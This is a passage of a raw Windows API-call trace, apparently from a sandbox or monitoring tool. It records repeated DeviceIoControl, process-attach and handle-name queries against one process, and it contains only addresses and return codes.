ObReferenceObjectByHandle (in: Handle=0x12dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002967d10, HandleInformation=0x0) returned 0x0 [0245.562] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.562] PsReleaseProcessExitSynchronization () returned 0x2 [0245.562] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.562] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.562] ObfDereferenceObject (Object=0xfffffa8002967d10) returned 0x2 [0245.562] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.562] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.562] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.563] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0245.563] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.563] PsAcquireProcessExitSynchronization () returned 0x0 [0245.563] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.563] ObReferenceObjectByHandle (in: Handle=0x12ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036d25e0, HandleInformation=0x0) returned 0x0 [0245.563] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.563] PsReleaseProcessExitSynchronization () returned 0x2 [0245.563] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.563] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.563] ObfDereferenceObject (Object=0xfffffa80036d25e0) returned 0x2 [0245.563] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.563] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.563] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.563] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.563] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.563] PsAcquireProcessExitSynchronization () returned 0x0 [0245.563] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.563] ObReferenceObjectByHandle (in: Handle=0x12f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010ff930, HandleInformation=0x0) returned 0x0 [0245.563] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.563] PsReleaseProcessExitSynchronization () returned 0x2 [0245.563] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.563] ObQueryNameString (in: Object=0xfffff8a0010ff930, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.563] ObfDereferenceObject (Object=0xfffff8a0010ff930) returned 0x1 [0245.563] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.564] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.564] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.564] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.564] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.564] PsAcquireProcessExitSynchronization () returned 0x0 [0245.564] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.564] ObReferenceObjectByHandle (in: Handle=0x12f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002176990, HandleInformation=0x0) returned 0x0 [0245.564] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.564] PsReleaseProcessExitSynchronization () returned 0x2 [0245.564] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.564] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.564] ObfDereferenceObject (Object=0xfffffa8002176990) returned 0x2 [0245.564] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.564] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.564] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.564] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.564] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.564] PsAcquireProcessExitSynchronization () returned 0x0 [0245.564] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.564] ObReferenceObjectByHandle (in: Handle=0x12f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b9eaf0, HandleInformation=0x0) returned 0x0 [0245.564] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.564] PsReleaseProcessExitSynchronization () returned 0x2 [0245.564] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.564] ObQueryNameString (in: Object=0xfffff8a001b9eaf0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.564] ObfDereferenceObject (Object=0xfffff8a001b9eaf0) returned 0x1 [0245.564] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.565] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.565] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.565] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.565] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.565] PsAcquireProcessExitSynchronization () returned 0x0 [0245.565] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.565] ObReferenceObjectByHandle (in: Handle=0x1300, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001ba4830, HandleInformation=0x0) returned 0x0 [0245.565] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.565] PsReleaseProcessExitSynchronization () returned 0x2 [0245.565] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.565] ObQueryNameString (in: Object=0xfffff8a001ba4830, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.565] ObfDereferenceObject (Object=0xfffff8a001ba4830) returned 0x1 [0245.565] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.565] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.565] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.565] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.565] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.565] PsAcquireProcessExitSynchronization () returned 0x0 [0245.565] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.565] ObReferenceObjectByHandle (in: Handle=0x1308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036d2730, HandleInformation=0x0) returned 0x0 [0245.565] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.565] PsReleaseProcessExitSynchronization () returned 0x2 [0245.565] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.565] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.565] ObfDereferenceObject (Object=0xfffffa80036d2730) returned 0x2 [0245.565] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.566] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.566] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.566] PsAcquireProcessExitSynchronization () returned 0x0 [0245.566] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.566] ObReferenceObjectByHandle (in: Handle=0x130c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001943740, HandleInformation=0x0) returned 0x0 [0245.566] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.566] PsReleaseProcessExitSynchronization () returned 0x2 [0245.566] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.566] ObQueryNameString (in: Object=0xfffff8a001943740, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.566] ObfDereferenceObject (Object=0xfffff8a001943740) returned 0x1 [0245.566] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.566] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.566] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.566] PsAcquireProcessExitSynchronization () returned 0x0 [0245.566] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.566] ObReferenceObjectByHandle (in: Handle=0x1318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800b53c5a0, HandleInformation=0x0) returned 0x0 [0245.566] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.566] PsReleaseProcessExitSynchronization () returned 0x2 [0245.566] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.566] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.566] ObfDereferenceObject (Object=0xfffffa800b53c5a0) returned 0x2 [0245.566] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.567] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.567] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.567] PsAcquireProcessExitSynchronization () returned 0x0 [0245.567] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.567] ObReferenceObjectByHandle (in: Handle=0x132c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002967d10, HandleInformation=0x0) returned 0x0 [0245.567] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.567] PsReleaseProcessExitSynchronization () returned 0x2 [0245.567] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.567] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.567] ObfDereferenceObject (Object=0xfffffa8002967d10) returned 0x2 [0245.567] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.567] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.567] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.567] PsAcquireProcessExitSynchronization () returned 0x0 [0245.567] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.567] ObReferenceObjectByHandle (in: Handle=0x1344, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800b53c6f0, HandleInformation=0x0) returned 0x0 [0245.567] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.567] PsReleaseProcessExitSynchronization () returned 0x2 [0245.567] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.567] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.568] ObfDereferenceObject (Object=0xfffffa800b53c6f0) returned 0x2 [0245.568] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.568] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.568] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0245.568] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.568] PsAcquireProcessExitSynchronization () returned 0x0 [0245.568] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.568] ObReferenceObjectByHandle (in: Handle=0x135c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019266a0, HandleInformation=0x0) returned 0x0 [0245.568] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.568] PsReleaseProcessExitSynchronization () returned 0x2 [0245.568] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.568] ObQueryNameString (in: Object=0xfffff8a0019266a0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.568] ObfDereferenceObject (Object=0xfffff8a0019266a0) returned 0x2 [0245.568] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.568] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.568] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0245.568] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.568] PsAcquireProcessExitSynchronization () returned 0x0 [0245.568] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.568] ObReferenceObjectByHandle (in: Handle=0x1364, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800209e600, HandleInformation=0x0) returned 0x0 [0245.568] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.568] PsReleaseProcessExitSynchronization () returned 0x2 [0245.568] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.569] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.569] ObfDereferenceObject (Object=0xfffffa800209e600) returned 0x11 [0245.569] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.569] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.569] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf2, lpOverlapped=0x0) returned 1 [0245.569] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.569] PsAcquireProcessExitSynchronization () returned 0x0 [0245.569] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.569] ObReferenceObjectByHandle (in: Handle=0x1368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019277c0, HandleInformation=0x0) returned 0x0 [0245.569] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.569] PsReleaseProcessExitSynchronization () returned 0x2 [0245.569] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.569] ObQueryNameString (in: Object=0xfffff8a0019277c0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.569] ObfDereferenceObject (Object=0xfffff8a0019277c0) returned 0x2 [0245.569] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.569] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.569] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0245.569] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.569] PsAcquireProcessExitSynchronization () returned 0x0 [0245.569] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.569] ObReferenceObjectByHandle (in: Handle=0x1370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800218e960, HandleInformation=0x0) returned 0x0 [0245.569] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.569] PsReleaseProcessExitSynchronization () returned 0x2 [0245.569] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.569] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.569] ObfDereferenceObject (Object=0xfffffa800218e960) returned 0x1 [0245.569] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.570] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.570] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0245.570] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.570] PsAcquireProcessExitSynchronization () returned 0x0 [0245.570] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.570] ObReferenceObjectByHandle (in: Handle=0x1374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001abf190, HandleInformation=0x0) returned 0x0 [0245.570] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.570] PsReleaseProcessExitSynchronization () returned 0x2 [0245.570] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.570] ObQueryNameString (in: 